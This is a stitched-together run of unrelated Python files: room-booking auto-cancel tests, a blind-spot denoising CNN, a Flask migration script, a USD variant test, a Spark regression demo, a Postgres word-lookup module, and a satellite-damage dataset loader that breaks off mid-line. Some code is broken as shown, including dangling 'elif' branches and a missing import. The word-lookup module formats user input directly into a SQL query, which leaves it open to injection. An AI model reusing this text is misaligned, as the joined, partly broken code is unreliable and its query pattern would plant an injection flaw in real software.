def test_auto_cancel(db, create_room, mocker, no_csrf_client, dummy_user, room_attributes, freeze_time): attr_approval = room_attributes[1] notify_cancel = mocker.patch('indico_burotel.tasks.notify_automatic_cancellation') notify_about_to_cancel = mocker.patch('indico_burotel.tasks.notify_about_to_cancel') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True, attributes=[RoomAttributeAssociation(attribute=attr_approval, value='yes')]) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-03-02", # This is a Monday 'end_dt': "2020-03-10", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 # 1 day after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 3)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 2 days after the start date, a warning freeze_time(datetime(2020, 3, 4)) auto_cancel_bookings() assert notify_about_to_cancel.called assert not notify_cancel.called # reset mocks notify_about_to_cancel.reset_mock() notify_cancel.reset_mock() # 3 days after the start date, cancellation happens freeze_time(datetime(2020, 3, 5)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert notify_cancel.called def test_auto_cancel_weekend(db, create_room, mocker, no_csrf_client, dummy_user, room_attributes, freeze_time): attr_approval = room_attributes[1] notify_cancel = mocker.patch('indico_burotel.tasks.notify_automatic_cancellation') notify_about_to_cancel = mocker.patch('indico_burotel.tasks.notify_about_to_cancel') room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True, attributes=[RoomAttributeAssociation(attribute=attr_approval, value='yes')]) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-03-05", # This is a Thursday 'end_dt': "2020-03-15", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 # 1 day after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 6)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 2 days after the start date, still nothing (weekend) freeze_time(datetime(2020, 3, 7)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 3 days after the start date, same freeze_time(datetime(2020, 3, 8)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 4 days after the start date, cancellation warning freeze_time(datetime(2020, 3, 9)) auto_cancel_bookings() assert notify_about_to_cancel.called assert not notify_cancel.called # reset mocks notify_about_to_cancel.reset_mock() notify_cancel.reset_mock() # 5 days after the start date, cancellation happens freeze_time(datetime(2020, 3, 10)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert notify_cancel.called def test_no_auto_cancel(db, create_room, mocker, no_csrf_client, dummy_user, room_attributes, freeze_time): notify_cancel = 
mocker.patch('indico_burotel.tasks.notify_automatic_cancellation') notify_about_to_cancel = mocker.patch('indico_burotel.tasks.notify_about_to_cancel') # room id not set for automatic cancellation room = create_room(protection_mode=ProtectionMode.public, reservations_need_confirmation=True) with no_csrf_client.session_transaction() as sess: sess.set_session_user(dummy_user) response = no_csrf_client.post(url_for('rb.create_booking'), data={ 'start_dt': "2020-03-02", # This is a Monday 'end_dt': "2020-03-10", 'repeat_frequency': 'DAY', 'repeat_interval': 1, 'booked_for_user': dummy_user.identifier, 'booking_reason': 'just chillin', 'room_id': room.id, 'is_prebooking': True }) assert response.status_code == 200 # 1 day after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 3)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 2 days after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 4)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called # 3 days after the start date, no warning, no cancellation freeze_time(datetime(2020, 3, 5)) auto_cancel_bookings() assert not notify_about_to_cancel.called assert not notify_cancel.called import os import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.nn import init from functools import partial def init_weights(net, init_type='kaiming', init_gain=0.02): """Initialize network weights. Parameters: net (network) -- network to be initialized init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal init_gain (float) -- scaling factor for normal, xavier and orthogonal. We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might work better for some applications. Feel free to try yourself. """ def init_func(m): # define the initialization function classname = m.__class__.__name__ if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1): if init_type == 'normal': init.normal_(m.weight.data, 0.0, init_gain) elif init_type == 'xavier': init.xavier_normal_(m.weight.data, gain=init_gain) elif init_type == 'kaiming': init.kaiming_normal_(m.weight.data, a=0, mode='fan_in') elif init_type == 'orthogonal': init.orthogonal_(m.weight.data, gain=init_gain) else: raise NotImplementedError('initialization method [%s] is not implemented' % init_type) if hasattr(m, 'bias') and m.bias is not None: init.constant_(m.bias.data, 0.0) elif classname.find('BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies. init.normal_(m.weight.data, 1.0, init_gain) init.constant_(m.bias.data, 0.0) # print('initialize network with %s' % init_type) net.apply(init_func) # apply the initialization function def weights_init_kaiming(lyr): r"""Initializes weights of the model according to the "He" initialization method described in "Delving deep into rectifiers: Surpassing human-level performance on ImageNet classification" - . et al. (2015), using a normal distribution. This function is to be called by the torch.nn.Module.apply() method, which applies weights_init_kaiming() to every layer of the model. 
""" classname = lyr.__class__.__name__ if classname.find('Conv') != -1: lyr.weight.data = nn.init.kaiming_normal_(lyr.weight.data, a=0, mode='fan_in') elif classname.find('Linear') != -1: nn.init.kaiming_normal_(lyr.weight.data, a=0, mode='fan_in') elif classname.find('BatchNorm') != -1: lyr.weight.data.normal_(mean=0, std=math.sqrt(2./9./64.)).\ clamp_(-0.025, 0.025) nn.init.constant_(lyr.bias.data, 0.0) class TrimmedConv2d(nn.Conv2d): def __init__(self, *args, **kwargs): if 'dilation' in kwargs: self.dilation = kwargs['dilation'] kwargs.pop('dilation') else: self.dilation = 1 if 'direction' in kwargs: self.direction = kwargs['direction'] kwargs.pop('direction') else: self.direction = 0 super(TrimmedConv2d, self).__init__(*args, **kwargs) self.slide_winsize = self.weight.shape[2]*self.weight.shape[3] self.last_size = torch.zeros(2) self.feature_mask=None self.mask_ratio=None self.weight_mask=None self.mask_ratio_dict=dict() self.feature_mask_dict=dict() def update_mask(self): with torch.no_grad(): self.feature_mask=self.feature_mask_dict[str(self.direction)].to(self.weight.device) self.mask_ratio=self.mask_ratio_dict[str(self.direction)].to(self.weight.device) self.weight_mask=self.get_weight_mask().to(self.weight.device) def get_weight_mask(self,direction=None): weight = np.ones((1, 1, self.kernel_size[0], self.kernel_size[1])) weight[:, :, self.kernel_size[0] // 2, self.kernel_size[1] // 2] = 0 return torch.tensor(weight.copy(),dtype=torch.float32) def update_feature_mask_dict(self,input_h,input_w): with torch.no_grad(): for direct in range(0,1): mask = torch.ones(1, 1, int(input_h), int(input_w)) weight_mask=self.get_weight_mask(direct) (pad_h,pad_w)=self.padding pad=torch.nn.ZeroPad2d((pad_w,pad_w,pad_h,pad_h)) feature_mask = F.conv2d(pad(mask), weight_mask, bias=None, stride=self.stride, dilation=self.dilation, groups=1) mask_ratio = self.slide_winsize / (feature_mask + 1e-8) # mask_ratio=torch.sqrt(mask_ratio) feature_mask = torch.clamp(feature_mask, 0, 1) mask_ratio = torch.mul(mask_ratio, feature_mask) self.mask_ratio_dict[str(direct)]=mask_ratio self.feature_mask_dict[str(direct)]=feature_mask def updata_last_size(self,h,w): self.last_size.copy_(torch.tensor((h,w),dtype=torch.int32)) def forward(self, input): if (int(self.last_size[0].item()),int(self.last_size[1].item()))!= (int(input.data.shape[2]), int(input.data.shape[3])): self.update_feature_mask_dict(input.data.shape[2],input.data.shape[3]) self.update_mask() self.updata_last_size(input.data.shape[2],input.data.shape[3]) if self.feature_mask is None or self.mask_ratio is None or self.weight_mask is None: #self.update_feature_mask_dict() self.update_mask() #if self.feature_mask.device != self.weight.device or self.mask_ratio.device != self.weight.device or self.weight_mask.device!=self.weight.device: # with torch.no_grad(): w=torch.mul(self.weight, self.weight_mask) raw_out = F.conv2d(input,w,self.bias, self.stride, self.padding, self.dilation, self.groups) if self.bias is not None: bias_view = self.bias.view(1, self.out_channels, 1, 1) output = torch.mul(raw_out - bias_view, self.mask_ratio) + bias_view output = torch.mul(output, self.feature_mask) else: output = torch.mul(raw_out, self.mask_ratio) return output class MaskConv2d(nn.Conv2d): def __init__(self, *args, **kwargs): if 'dilation' in kwargs: self.dilation = kwargs['dilation'] kwargs.pop('dilation') else: self.dilation = 1 if 'direction' in kwargs: self.direction = kwargs['direction'] kwargs.pop('direction') else: self.direction = 0 super(MaskConv2d, 
self).__init__(*args, **kwargs) self.weight_mask = self.get_weight_mask() # remove the center position, [1 1 1;1 0 1;1 1 1] def get_weight_mask(self): weight = np.ones((1, 1, self.kernel_size[0], self.kernel_size[1])) weight[:, :, self.kernel_size[0] // 2, self.kernel_size[1] // 2] = 0 return torch.tensor(weight.copy(), dtype=torch.float32) def forward(self, input): if self.weight_mask.type() != self.weight.type(): with torch.no_grad(): self.weight_mask = self.weight_mask.type(self.weight.type()) w=torch.mul(self.weight,self.weight_mask) output = F.conv2d(input, w, self.bias, self.stride, self.padding, self.dilation, self.groups) return output def BlindSpotConv(in_planes, out_planes, kernel_size, stride=1, dilation=1, bias=False, conv_type='Trimmed'): if conv_type.lower()=='trimmed': return TrimmedConv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size+(kernel_size-1)*(dilation-1)-1)//2, dilation=dilation, bias=bias, direction=0) elif conv_type.lower()=='mask': return MaskConv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size+(kernel_size-1)*(dilation-1)-1)//2, dilation=dilation, bias=bias, direction=0) else: raise BaseException("Invalid Conv Type!") class Inception_block(nn.Module): def __init__(self, inplanes, kernel_size, dilation, bias, activate_fun): super(Inception_block, self).__init__() # if activate_fun == 'Relu': # self.relu = nn.ReLU(inplace=True) self.relu = partial(nn.ReLU, inplace=True) elif activate_fun == 'LeakyRelu': # self.relu = nn.LeakyReLU(0.1) self.relu = partial(nn.LeakyReLU, negative_slope=0.1) else: raise ValueError('activate_fun [%s] is not found.' % (activate_fun)) # pad_size = (kernel_size+(kernel_size-1)*(dilation-1)-1)//2 # inception_br1 ---------------------------------------------- lyr_br1=[] # 1x1 conv lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bias)) lyr_br1.append(self.relu()) # # case1: two 3x3 dilated-conv # lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size, padding=pad_size, dilation=dilation, bias=bias)) # lyr_br1.append(self.relu()) # lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size, padding=pad_size, dilation=dilation, bias=bias)) # lyr_br1.append(self.relu()) # case2: one 5x5 dilated-conv tmp_kernel_size = 5 tmp_pad_size = (tmp_kernel_size+(tmp_kernel_size-1)*(dilation-1)-1)//2 lyr_br1.append(nn.Conv2d(inplanes, inplanes, kernel_size=tmp_kernel_size, padding=tmp_pad_size, dilation=dilation, bias=bias)) lyr_br1.append(self.relu()) self.inception_br1=nn.Sequential(*lyr_br1) init_weights(self.inception_br1) # # inception_br2 ---------------------------------------------- lyr_br2=[] # 1x1 conv lyr_br2.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bias)) lyr_br2.append(self.relu()) # 3x3 dilated-conv lyr_br2.append(nn.Conv2d(inplanes, inplanes, kernel_size, padding=pad_size, dilation=dilation, bias=bias)) lyr_br2.append(self.relu()) self.inception_br2=nn.Sequential(*lyr_br2) init_weights(self.inception_br2) # # inception_br3 ---------------------------------------------- lyr_br3=[] # 1x1 conv lyr_br3.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bias)) lyr_br3.append(self.relu()) self.inception_br3=nn.Sequential(*lyr_br3) init_weights(self.inception_br3) # Concat three inception branches self.concat = nn.Conv2d(inplanes*3,inplanes,kernel_size=1,bias=bias) self.concat.apply(weights_init_kaiming) # 1x1 convs lyr=[] lyr.append(nn.Conv2d(inplanes,inplanes,kernel_size=1,bias=bias)) lyr.append(self.relu()) 
lyr.append(nn.Conv2d(inplanes,inplanes,kernel_size=1,bias=bias)) lyr.append(self.relu()) self.middle_1x1_convs=nn.Sequential(*lyr) init_weights(self.middle_1x1_convs) def forward(self, x): residual = x x1 = self.inception_br1(x) x2 = self.inception_br2(x) x3 = self.inception_br3(x) out = torch.cat((x1, x2, x3), dim=1) out = self.concat(out) out = torch.relu_(out) out = out + residual out = self.middle_1x1_convs(out) return out class DBSN_branch(nn.Module): def __init__(self, inplanes, bs_conv_type, bs_conv_bias, bs_conv_ks, block_num, activate_fun): super(DBSN_branch, self).__init__() # if activate_fun == 'Relu': # self.relu = nn.ReLU(inplace=True) self.relu = partial(nn.ReLU, inplace=True) elif activate_fun == 'LeakyRelu': # self.relu = nn.LeakyReLU(0.1) self.relu = partial(nn.LeakyReLU, negative_slope=0.1) else: raise ValueError('activate_fun [%s] is not found.' % (activate_fun)) # dilation_base=(bs_conv_ks+1)//2 # lyr=[] lyr.append(BlindSpotConv(inplanes, inplanes, bs_conv_ks, stride=1, dilation=1, bias=bs_conv_bias, conv_type=bs_conv_type)) lyr.append(self.relu()) lyr.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bs_conv_bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bs_conv_bias)) lyr.append(self.relu()) # for i in range(block_num): lyr.append(Inception_block(inplanes, kernel_size=3, dilation=dilation_base, bias=bs_conv_bias, activate_fun=activate_fun)) # lyr.append(nn.Conv2d(inplanes, inplanes, kernel_size=1, bias=bs_conv_bias)) self.branch=nn.Sequential(*lyr) init_weights(self.branch) def forward(self,x): return self.branch(x) class DBSN_Model(nn.Module): def __init__(self, in_ch, out_ch, mid_ch, blindspot_conv_type, blindspot_conv_bias, br1_blindspot_conv_ks, br1_block_num, br2_blindspot_conv_ks, br2_block_num, activate_fun): super(DBSN_Model,self).__init__() # if activate_fun == 'Relu': # self.relu = nn.ReLU(inplace=True) self.relu = partial(nn.ReLU, inplace=True) elif activate_fun == 'LeakyRelu': # self.relu = nn.LeakyReLU(0.1) self.relu = partial(nn.LeakyReLU, negative_slope=0.1) else: raise ValueError('activate_fun [%s] is not found.' 
% (activate_fun)) # Head of DBSN lyr = [] lyr.append(nn.Conv2d(in_ch, mid_ch, kernel_size=1, bias=blindspot_conv_bias)) lyr.append(self.relu()) self.dbsn_head = nn.Sequential(*lyr) init_weights(self.dbsn_head) self.br1 = DBSN_branch(mid_ch, blindspot_conv_type, blindspot_conv_bias, br1_blindspot_conv_ks, br1_block_num, activate_fun) self.br2 = DBSN_branch(mid_ch, blindspot_conv_type, blindspot_conv_bias, br2_blindspot_conv_ks, br2_block_num, activate_fun) # Concat two branches self.concat = nn.Conv2d(mid_ch*2,mid_ch,kernel_size=1,bias=blindspot_conv_bias) self.concat.apply(weights_init_kaiming) # 1x1 convs lyr=[] lyr.append(nn.Conv2d(mid_ch,mid_ch,kernel_size=1,bias=blindspot_conv_bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(mid_ch,mid_ch,kernel_size=1,bias=blindspot_conv_bias)) lyr.append(self.relu()) lyr.append(nn.Conv2d(mid_ch,out_ch,kernel_size=1,bias=blindspot_conv_bias)) self.dbsn_tail=nn.Sequential(*lyr) init_weights(self.dbsn_tail) def forward(self, x): x = self.dbsn_head(x) x1 = self.br1(x) x2 = self.br2(x) x_concat = torch.cat((x1,x2), dim=1) x = self.concat(x_concat) return self.dbsn_tail(x), xfrom app import app, db from flask_script import Manager from flask_migrate import Migrate, MigrateCommand import models ## ------------------------ Migrations ------------------------ ## migrate = Migrate(app, db) manager = Manager(app) manager.add_command('db', MigrateCommand) if __name__ == '__main__': # $ python migrate.py db init # $ python migrate.py db migrate # $ python migrate.py db upgrade manager.run()#!/pxrpythonsubst # # Copyright 2017 Pixar # # Licensed under the Apache License, Version 2.0 (the "Apache License") # with the following modification; you may not use this file except in # compliance with the Apache License and the following modification to it: # Section 6. Trademarks. is deleted and replaced with: # # 6. Trademarks. This License does not grant permission to use the trade # names, trademarks, service marks, or product names of the Licensor # and its affiliates, except as required to comply with Section 4(c) of # the License and to reproduce the content of the NOTICE file. # # You may obtain a copy of the Apache License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the Apache License with the above modification is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the Apache License for the specific # language governing permissions and limitations under the Apache License. import os, sys from pxr import Gf, Tf, Sdf, Usd def OpenLayer(name): layerFile = '%s.usda' % name layer = Sdf.Layer.FindOrOpen(layerFile) assert layer, 'failed to open layer @%s@' % layerFile return layer # Open stage. layer = OpenLayer('testAPI_var') stage = Usd.Stage.Open(layer.identifier) assert stage, 'failed to create stage for @%s@' % layer.identifier # Check GetLayerStack behavior. assert stage.GetLayerStack()[0] == stage.GetSessionLayer() # Get LayerStack without session layer. rootLayer = stage.GetLayerStack(includeSessionLayers=False)[0] assert rootLayer == stage.GetRootLayer() # Get Sarah prim. sarah = stage.GetPrimAtPath('/Sarah') assert sarah, 'failed to find prim /Sarah' # Sanity check simple composition. assert sarah.GetAttribute('color').Get() == Gf.Vec3d(1,0,0) # Verify that the base prim does not have the custom attribute that we will # create later in the variant. 
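# (OverridePrim returns the prim at that path, authoring a minimal 'over' spec if nothing
#  is defined there yet, so the attribute check below works even before the variant edit.)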
emptyPrim = stage.OverridePrim('/Sarah/EmptyPrim') assert emptyPrim assert not emptyPrim.GetAttribute('newAttr') # Should start out with EditTarget being local & root layer. assert (stage.HasLocalLayer(stage.GetEditTarget().GetLayer()) and stage.GetEditTarget().GetLayer() == stage.GetRootLayer()) # Try editing a local variant. displayColor = sarah.GetVariantSet('displayColor') assert displayColor.GetVariantSelection() == 'red' assert sarah.GetVariantSets().GetVariantSelection('displayColor') == 'red' with displayColor.GetVariantEditContext(): sarah.GetAttribute('color').Set(Gf.Vec3d(1,1,1)) stage.DefinePrim(sarah.GetPath().AppendChild('Child'), 'Scope') # Bug 90706 - verify that within a VariantSet, a new attribute that does # not exist on the base prim returns True for IsDefined() over = stage.OverridePrim('/Sarah/EmptyPrim') assert over over.CreateAttribute('newAttr', Sdf.ValueTypeNames.Int) assert over.GetAttribute('newAttr').IsDefined() # Test existence of the newly created attribute again, outside of the edit # context, while we are still set to the variant selection from which we created # the attribute. emptyPrim = stage.OverridePrim('/Sarah/EmptyPrim') assert emptyPrim assert emptyPrim.GetAttribute('newAttr').IsDefined() assert sarah.GetAttribute('color').Get() == Gf.Vec3d(1,1,1) assert stage.GetPrimAtPath(sarah.GetPath().AppendChild('Child')) # Switch to 'green' variant. displayColor.SetVariantSelection('green') assert displayColor.GetVariantSelection() == 'green' # Should not be picking up variant opinions authored above. assert sarah.GetAttribute('color').Get() == Gf.Vec3d(0,1,0) assert not stage.GetPrimAtPath(sarah.GetPath().AppendChild('Scope')) emptyPrim = stage.OverridePrim('/Sarah/EmptyPrim') assert emptyPrim assert not emptyPrim.GetAttribute('newAttr').IsDefined() displayColor.ClearVariantSelection() assert displayColor.GetVariantSelection() == '' # Test editing a variant that doesn't yet have opinions. sarah_ref = stage.GetPrimAtPath('/Sarah_ref') displayColor = sarah_ref.GetVariantSet('displayColor') displayColor.SetVariantSelection('red') assert displayColor.GetVariantSelection() == 'red' with displayColor.GetVariantEditContext(): sarah_ref.GetAttribute('color').Set(Gf.Vec3d(2,2,2)) assert sarah_ref.GetAttribute('color').Get() == Gf.Vec3d(2,2,2) def TestNewPayloadAutoLoading(): print 'TestNewPayloadAutoLoading' # Test that switching a variant that introduces a payload causes the payload # to be included if the parent is loaded, and vice versa. rootLayer = Sdf.Layer.CreateAnonymous() payloadLayer = Sdf.Layer.CreateAnonymous() Sdf.CreatePrimInLayer(rootLayer, '/main') Sdf.CreatePrimInLayer(payloadLayer, '/parent/child') stage = Usd.Stage.Open(rootLayer) main = stage.GetPrimAtPath('/main') pvs = main.GetVariantSets().AppendVariantSet('payload_vset') withPayload = pvs.AppendVariant('with_payload') withoutPayload = pvs.AppendVariant('without_payload') pvs.SetVariantSelection('with_payload') with pvs.GetVariantEditContext(): main.SetPayload(payloadLayer, '/parent') pvs.SetVariantSelection('without_payload') # Now open the stage load all, we shouldn't have /main/child. stage = Usd.Stage.Open(rootLayer, load=Usd.Stage.LoadAll) assert stage.GetPrimAtPath('/main') assert not stage.GetPrimAtPath('/main/child') # Switching the selection should cause the payload to auto-load. 
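    # (this stage was opened with load=Usd.Stage.LoadAll, so /main is loaded and the
    #  payload introduced by the variant should be pulled in automatically)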
    stage.GetPrimAtPath('/main').GetVariantSet(
        'payload_vset').SetVariantSelection('with_payload')
    main = stage.GetPrimAtPath('/main')
    assert main and main.IsLoaded()
    assert stage.GetPrimAtPath('/main/child')

    # Open the stage again, but with load-none.
    stage = Usd.Stage.Open(rootLayer, load=Usd.Stage.LoadNone)
    assert stage.GetPrimAtPath('/main')
    assert not stage.GetPrimAtPath('/main/child')

    # Switching the selection should NOT cause the payload to auto-load.
    stage.GetPrimAtPath('/main').GetVariantSet(
        'payload_vset').SetVariantSelection('with_payload')
    main = stage.GetPrimAtPath('/main')
    assert main and not main.IsLoaded()
    assert not stage.GetPrimAtPath('/main/child')

TestNewPayloadAutoLoading()

print 'OK'

# -*- coding: UTF-8 -*-
"""
This script demonstrates the shortcomings of LinearRegressionWithSGD in Spark MLlib.
"""
import os

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression as sklearnLR
from pyspark.sql import SparkSession
from pyspark.mllib.regression import LabeledPoint, LinearRegressionWithSGD


def read_data(path):
    """
    Read the data using pandas.
    """
    data = pd.read_csv(path, header=None)
    return np.c_[data.values[:, 0], data.values[:, 3]]


def generate_data(n):
    """
    Generate the data used to train the models.
    """
    np.random.seed(4060)
    x = np.linspace(-7, 7, n)
    error = np.random.randn(n)
    y = 1 * x + 2 + error
    return np.c_[y, x]


def start_spark():
    """
    Create the SparkSession, which is the entry point of a Spark program.
    """
    spark = SparkSession.builder.appName("sparkml_vs_sklearn").getOrCreate()
    return spark


def trans_2_RDD(data, sc):
    """
    Convert the in-memory Python data to an RDD.
    """
    data = sc.parallelize(data)
    data = data.map(lambda line: LabeledPoint(line[0], line[1:]))
    return data


def train_model(data, rdd):
    """
    Train the models with scikit-learn and Spark MLlib respectively.
    """
    sklearn_model = sklearnLR()
    sklearn_model.fit(data[:, 1:], data[:, 0])
    mllib_model = LinearRegressionWithSGD.train(rdd, intercept=True)
    return sklearn_model, mllib_model


def run(spark, data_path):
    """
    The entry point of the program.
    """
    data = read_data(data_path)
    rdd = trans_2_RDD(data, spark._sc)
    sklearn_model, mllib_model = train_model(data, rdd)
    # Create a figure
    fig = plt.figure(figsize=(12, 6), dpi=80)
    ax = fig.add_subplot(1, 2, 1)
    _visualize(sklearn_model, mllib_model, data, ax)
    data = generate_data(200)
    rdd = trans_2_RDD(data, spark._sc)
    sklearn_model, mllib_model = train_model(data, rdd)
    ax = fig.add_subplot(1, 2, 2)
    _visualize(sklearn_model, mllib_model, data, ax)
    plt.show()


def _visualize(sklearn_model, mllib_model, data, ax):
    """
    Visualize the model results.
    """
    ax.set_ylim([data[:, 0].min()-1, data[:, 0].max()+1])
    ax.scatter(data[:, 1], data[:, 0], alpha=0.5)
    x = np.linspace(data[:, 1].min(), data[:, 1].max(), 100)
    ax.plot(x, sklearn_model.predict(x.reshape(-1, 1)), "k", linewidth=2, label="scikit-learn")
    ax.plot(x, [mllib_model.predict(i) for i in x.reshape(-1, 1)], "r-.", linewidth=2, label="Spark MLlib")
    legend = plt.legend(shadow=True)


if __name__ == "__main__":
    spark = start_spark()
    home_path = os.path.dirname(os.path.abspath(__file__))
    # The data path on Windows differs from the one on Linux
    if os.name == "nt":
        data_path = "%s\\data\\reg_data.csv" % home_path
    else:
        data_path = "%s/data/reg_data.csv" % home_path
    run(spark, data_path)
SteveLim99/graphAI_webapp
graphs = {
    'BPNM': 1,
    'Swimlane': 2
}
Winnetou/ManuTironis
# here we talk to table words - get them, check they exists, etc
import psycopg2

conn = psycopg2.connect("dbname=manu_tironis user=quellen password=")
cursor = conn.cursor()


def get_smlar_len_words(incorrect):
    """
    :return: all words of len close to len(incorrect).
""" ln = len(incorrect) cursor.execute('''SELECT word FROM words WHERE char_length(WORD)>%s AND char_length(WORD)<%s''', (ln - 1, ln + 1)) c = cursor.fetchall() words = [] for sublist in c: for element in sublist: words.append(element) return words def word_exists_in_dictionary(word): try: query_str = '''select exists(select word from words where word='{}')'''.format(word) cursor.execute(query_str) res = cursor.fetchone() return res[0] except: conn.rollback() return False def save_single_word(word): """ Saves a word to the database if it is not there yet """ word = clean(word) # FIXME # there must be a way to do that in smarter way on posgtres # maybe upsert ? # TODO - what shall we do about uppercase? try: exists_query = "SELECT EXISTS (SELECT word from words WHERE word = %s)" cursor.execute(exists_query, (word,)) if cursor.fetchone()[0]: return insert_command = "INSERT INTO words (word) VALUES (%s)" cursor.execute(insert_command, (word,)) conn.commit() except: conn.rollback() raise # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. import logging from PIL import Image from glob import glob import numpy as np import torch from torch.utils.data import Dataset import torchvision.transforms.functional as TF from torchvision import transforms import random import os class DisasterDataset(Dataset): def __init__(self, data_dir, data_dir_ls, data_mean_stddev, transform:bool, normalize:bool): self.data_dir = data_dir self.dataset_sub_dir = data_dir_ls self.data_mean_stddev = data_mean_stddev self.transform = transform self.normalize = normalize def __len__(self): return len(self.dataset_sub_dir) @classmethod def apply_transform(self, mask, pre_img, post_img, damage_class): ''' apply tranformation functions on PIL images ''' if random.random() > 0.5: # Resize img_h = pre_img.size[0] img_w = pre_img.size[1] resize = transforms.Resize(size=(int(round(1.016*img_h)), int(round(1.016*img_w)))) mask = resize(mask) pre_img = resize(pre_img) post_img = resize(post_img) damage_class = resize(damage_class) # Random crop i, j, h, w = transforms.RandomCrop.get_params(pre_img, output_size=(img_h, img_w)) mask = TF.crop(mask, i, j, h, w) pre_img = TF.crop(pre_img, i, j, h, w) post_img = TF.crop(post_img, i, j, h, w) damage_class = TF.crop(damage_class, i, j, h, w) # Random horizontal flipping if random.random() > 0.5: mask = TF.hflip(mask) pre_img = TF.hflip(pre_img) post_img = TF.hflip(post_img) damage_class = TF.hflip(damage_class) # Random vertical flipping if random.random() > 0.5: mask = TF.vflip(mask) pre_img = TF.vflip(pre_img) post_img = TF.vflip(post_img) damage_class = TF.vflip(damage_class) return mask, pre_img, post_img, damage_class def __getitem__(self, i): imgs_dir = os.path.join(self.data_dir ,self.dataset_sub_dir[i].replace('labels', 'images')) imgs_dir_tile = self.dataset_sub_dir[i].replace('labels', 'images') masks_dir = os.path.join(self.data_dir, self.dataset_sub_dir[i].replace('labels', 'targets_border2')) preds_dir = os.path.join(self.data_dir ,self.dataset_sub_dir[i].replace('labels', 'predictions')) idx = imgs_dir img_suffix = '_' + imgs_dir.split('_')[-1] img_suffix_tile = '_' + imgs_dir_tile.split('_')[-1] mask_suffix = '_' + masks_dir.split('_')[-1] pre_img_tile_name = imgs_dir_tile[0:-1*(len(img_suffix_tile))] + '_pre_disaster' pre_img_file_name = imgs_dir[0:-1*(len(img_suffix))] + '_pre_disaster' + img_suffix pre_img_file = glob(pre_img_file_name + '.*') mask_file_name = masks_dir[0:-1*(len(mask_suffix))] + '_pre_disaster_b2' + mask_suffix 
mask_file = glob(mask_file_name + '.*') post_img_tile_name = pre_img_tile_name.replace('pre', 'post') post_img_file_name = pre_img_file_name.replace('pre', 'post') post_img_file = glob(post_img_file_name + '.*') damage_class_file_name = mask_file_name.replace('pre', 'post') damage_class_file = glob(damage_class_file_name + '.*') assert len(mask_file) == 1, \ f'Either no mask or multiple masks found for the ID {idx}: {mask_file_name}' assert len(pre_img_file) == 1, \ f'Either no image or multiple images found for the ID {idx}: {pre_img_file_name}' assert len(post_img_file) == 1, \ f'Either no post disaster image or multiple images found for the ID {idx}: {post_img_file_name}' assert len(damage_class_file) == 1, \ f'Either no damage class image or multiple images found for the ID {idx}: {damage_class_file_name}' mask = Image.open(mask_file[0]) pre_img = Image.open(pre_img_file[0]) post_img = Image.open(post_img_file[0]) damage_class = Image.open(damage_class_file[0]) assert pre_img.size == mask.size, \ f'Image and building mask {idx} should be the same size, but are {pre_img.size} and {mask.size}' assert pre_img.size == damage_class.size, \ f'Image and damage classes mask {idx} should be the same size, but are {pre_img.size} and {damage_class.size}' assert pre_img.size == post_img.size, \ f'Pre_ & _post disaster Images {idx} should be the same size, but are {pre_img.size} and {post_img.size}' if self.transform is True: mask, pre_img, post_img, damage_class = self.apply_transform(mask, pre_img, post_img, damage_class) # copy original image for viz pre_img_orig = pre_img post_img_orig = post_img if self.normalize is True: # normalize the images based on a tilewise mean & std dev --> pre_ mean_pre = self.data_mean_stddev[pre_img_tile_name][0] stddev_pre = self.data_mean_stddev[pre_img_tile_name][1] norm_pre = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=mean_pre, std=stddev_pre) ]) pre_img = norm_pre(np.array(pre_img).astype(dtype='float64')/255.0) # normalize the images based on a tilewise mean & std dev --> post_ mean_post = self.data_mean_stddev[post_img_tile_name][0] stddev_post = self.data_mean_stddev[post_img_tile_name][1] norm_post = transforms.Compose([ 